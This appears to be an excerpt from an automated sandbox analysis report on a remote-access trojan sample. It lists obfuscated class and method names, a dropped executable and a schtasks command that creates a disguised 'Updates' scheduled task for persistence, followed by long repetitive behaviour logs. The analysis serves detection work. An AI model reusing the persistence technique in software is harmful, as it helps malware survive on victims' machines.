                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, fEaTuDV8YOyfDce1Gr.csHigh entropy of concatenated method names: 'lJs7VRZSi3', 'Pch76HnPE6', 'waL7QuYVud', 'Xe8QxrPnSy', 'SUjQzWLoNN', 'oOh7275Eic', 'LII7XdfUd5', 'OXG7MASNLV', 'o6L7j0oV8F', 'TMe7oj4S8y'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, eCybnUUGdbGwloyBj7.csHigh entropy of concatenated method names: 'QcS6nNfy65', 'IZj6IpejFk', 'J3C6glZtoH', 'kRv6yxFKDR', 'Qud6CMvJOW', 'asl6RRwfej', 'n306S9Jh19', 'AsT63X21Ik', 'cVo6v9poYX', 'hhV68dyQr0'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, Pc5EbqW7of4KtsoFdbm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NoH8wIUguG', 'z1e8dajAAa', 'Obh8cBPX6Y', 'o0W8YxhQ2K', 'p0M8FlvC35', 'F1k8t8QTfI', 'RHG8BnG5lg'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, qPR26bWP9YqtF728xSp.csHigh entropy of concatenated method names: 'rG5vh3TwnH', 'JMZv00OnlN', 'IhcvuAp9uB', 'IUmvnj8rYN', 'yO3viJ2jZr', 's7avI5fHjc', 'wu3vGubmmw', 'yffvgg3opd', 'RyxvyVMUVR', 'ITtvJ6ejkq'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, tc6CFuwhhqKghWoavi.csHigh entropy of concatenated method names: 'TC64wchO6y', 'PSm4dLZtRE', 'tCh4c64gPb', 'oKU4YE6WmO', 'F7g4Fein1R', 'brc4tHW8Lh', 'MYS4ByTvYv', 'QoU4eZpQZ3', 'rAi4kEaZqd', 'HOl4xEOCIS'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, KpGIMg9jS35kOWayWB.csHigh entropy of concatenated method names: 'iRavXJdJoL', 'j28vjYJ1on', 'cO5vo0QZkb', 'B09vVhU1fN', 'vlgv4Y1pix', 'KpGvUtP7Ip', 'bRkvQolkVR', 'RT53BmPGue', 's8w3eZfM1l', 'zSi3kXysor'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, Geok9UDGmJnESskYk6.csHigh entropy of concatenated method names: 'nEAuD0lDn', 'k6knAiJLk', 'NloI2QMWq', 'KfKGdF0FP', 'KDpyRwXgc', 'l5eJJqFdM', 'Ef5wrNDDaRAkXCrfUm', 'ygWAKiwbjKOGy9eQqM', 'RZ53xaKq7', 'Lj48UhUGh'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, DcHUM92j2w5Tv1Pf7E.csHigh entropy of concatenated method names: 'fnKjroV6RR', 'o6TjVopft1', 'A7xj4l2Rcm', 'M2oj6QPVBi', 'qr1jUxRYoE', 'hs1jQnVh75', 'miJj7QKrPL', 'svIjlO0gMn', 'TqWj17sIZZ', 'jI2jqCjhhM'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, bieio6Q9YImFOfmWOy.csHigh entropy of concatenated method names: 'Dispose', 'g5fXkaxBTb', 'n85MfiuDfO', 'Y0MKKFMbmB', 'Cw0Xxx2xPK', 'db1Xz8FYVX', 'ProcessDialogKey', 'LC3M2Sk8LB', 'FA6MX2cHyd', 'PMWMML8Uk9'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, ItnMZkLQR3l5sMrDFi.csHigh entropy of concatenated method names: 'BNSSeIG0I3', 'LWsSxsmWTZ', 'QxR32nE91b', 'ODp3XZEqUS', 'wXISpl75aY', 'nESSmP5KSi', 'DMdS9D90ev', 'qt9SwiKkhJ', 'pSpSd5QdyB', 'eKRScXxLIg'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, ux2XFhK0MLC0DLZuGq.csHigh entropy of concatenated method names: 'ToString', 'xifRpvoUtT', 'HqNRf5GyUA', 'zWsRDOyO3X', 'xnfRO1JkJw', 'muNRT7MmVO', 'TWwR5ui3bs', 'it3RsdXfZS', 'lKuRaGw3XJ', 'e5VRNmgRoA'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, FPXSFTjke38EUsFwMQ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'HARMkwNTfr', 'sx2MxnZmMN', 'i3bMzVPvtO', 'ri7j2Lt4bc', 'gqUjXW55to', 'hcAjMibAaD', 'IHijjudiKN', 'xIrfD5giXHZVB1KKgWh'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, bIslAo5xLyfYTdWbDU.csHigh entropy of concatenated method names: 'DPl3PkK2h7', 'IWt3fN2uIq', 'LXt3DGvDLf', 'ol43Oj0Eeb', 'R513w93ZMD', 'SPw3TlkZK6', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, FFL5rbCmJqMKZgE8Ip.csHigh entropy of concatenated method names: 'Qg9Qr8M1aB', 'jBtQ4y5U8S', 'yyIQUAXgLV', 'BTlQ7ZNm8J', 'eQsQlPSiK6', 'JHsUF6o9hO', 'VTlUtXKxve', 'OgLUBcjPaD', 'gYqUes9vBM', 'tp3UkUqHWu'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, lM8lcJnctlp2rWEnaI.csHigh entropy of concatenated method names: 'hM63V4GChJ', 'Uw93410JmR', 'vGo36cdFBE', 'mS83UZ6rWu', 'gPJ3Qp4GKk', 'cwq37Bqjsw', 'lHQ3lQCN7r', 'k0q31Oc95C', 'piO3qePxMh', 'RV83AIUcqk'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, ajVBtPWDB3rCCiSSxWl.csHigh entropy of concatenated method names: 'TvS8hsl079', 'BpC80PGBUq', 'hHi8upt9Tq', 'aFWeEvNK5eLYuKxZYuY', 'ipUWJANRjm73Mckjsbc', 'dl5qgJN3De1xmI04NgQ', 'yho2lTNVIfBMH3UHw9K'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, oho6rBSwnEYaeTlMlB.csHigh entropy of concatenated method names: 'vxR7hQ9VS9', 'aXn70nv0lH', 'gDu7uEjRYq', 'piL7n98WSr', 'udI7i7hd9y', 'gQk7IMYbZi', 'fVQ7GXQv3c', 'x1Q7gmyfHx', 'ama7y12TMu', 'ToT7JT0Bns'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, J1eemHk4KmHXVbcVHe.csHigh entropy of concatenated method names: 'PcWbgGdFBM', 'DgEbyqnfhj', 'sDxbPXFvBp', 'tl8bf0pds1', 'BNGbOn81il', 'IMObTmJJEI', 'eqQbs6wu2l', 'z4SbauVDSu', 'ra7bL7Na1k', 'IKjbpfbeAG'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, ohCSjHuOgcn8LMxW9w.csHigh entropy of concatenated method names: 'wLEX7IhQ8w', 'L0SXl63BU3', 'J3CXqrtr0y', 'DfgXA2eSrf', 'R3TXCMeP42', 'oWhXRxxmcY', 'rrWcP43uvOFI7CVamN', 'PKSmfGVXc5QutPn4RS', 'JDkXXVFE8r', 'lfpXjDHdio'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, fEaTuDV8YOyfDce1Gr.csHigh entropy of concatenated method names: 'lJs7VRZSi3', 'Pch76HnPE6', 'waL7QuYVud', 'Xe8QxrPnSy', 'SUjQzWLoNN', 'oOh7275Eic', 'LII7XdfUd5', 'OXG7MASNLV', 'o6L7j0oV8F', 'TMe7oj4S8y'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, eCybnUUGdbGwloyBj7.csHigh entropy of concatenated method names: 'QcS6nNfy65', 'IZj6IpejFk', 'J3C6glZtoH', 'kRv6yxFKDR', 'Qud6CMvJOW', 'asl6RRwfej', 'n306S9Jh19', 'AsT63X21Ik', 'cVo6v9poYX', 'hhV68dyQr0'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, Pc5EbqW7of4KtsoFdbm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NoH8wIUguG', 'z1e8dajAAa', 'Obh8cBPX6Y', 'o0W8YxhQ2K', 'p0M8FlvC35', 'F1k8t8QTfI', 'RHG8BnG5lg'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, qPR26bWP9YqtF728xSp.csHigh entropy of concatenated method names: 'rG5vh3TwnH', 'JMZv00OnlN', 'IhcvuAp9uB', 'IUmvnj8rYN', 'yO3viJ2jZr', 's7avI5fHjc', 'wu3vGubmmw', 'yffvgg3opd', 'RyxvyVMUVR', 'ITtvJ6ejkq'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, tc6CFuwhhqKghWoavi.csHigh entropy of concatenated method names: 'TC64wchO6y', 'PSm4dLZtRE', 'tCh4c64gPb', 'oKU4YE6WmO', 'F7g4Fein1R', 'brc4tHW8Lh', 'MYS4ByTvYv', 'QoU4eZpQZ3', 'rAi4kEaZqd', 'HOl4xEOCIS'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, KpGIMg9jS35kOWayWB.csHigh entropy of concatenated method names: 'iRavXJdJoL', 'j28vjYJ1on', 'cO5vo0QZkb', 'B09vVhU1fN', 'vlgv4Y1pix', 'KpGvUtP7Ip', 'bRkvQolkVR', 'RT53BmPGue', 's8w3eZfM1l', 'zSi3kXysor'
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeFile created: C:\Users\user\AppData\Roaming\zDAKFK.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
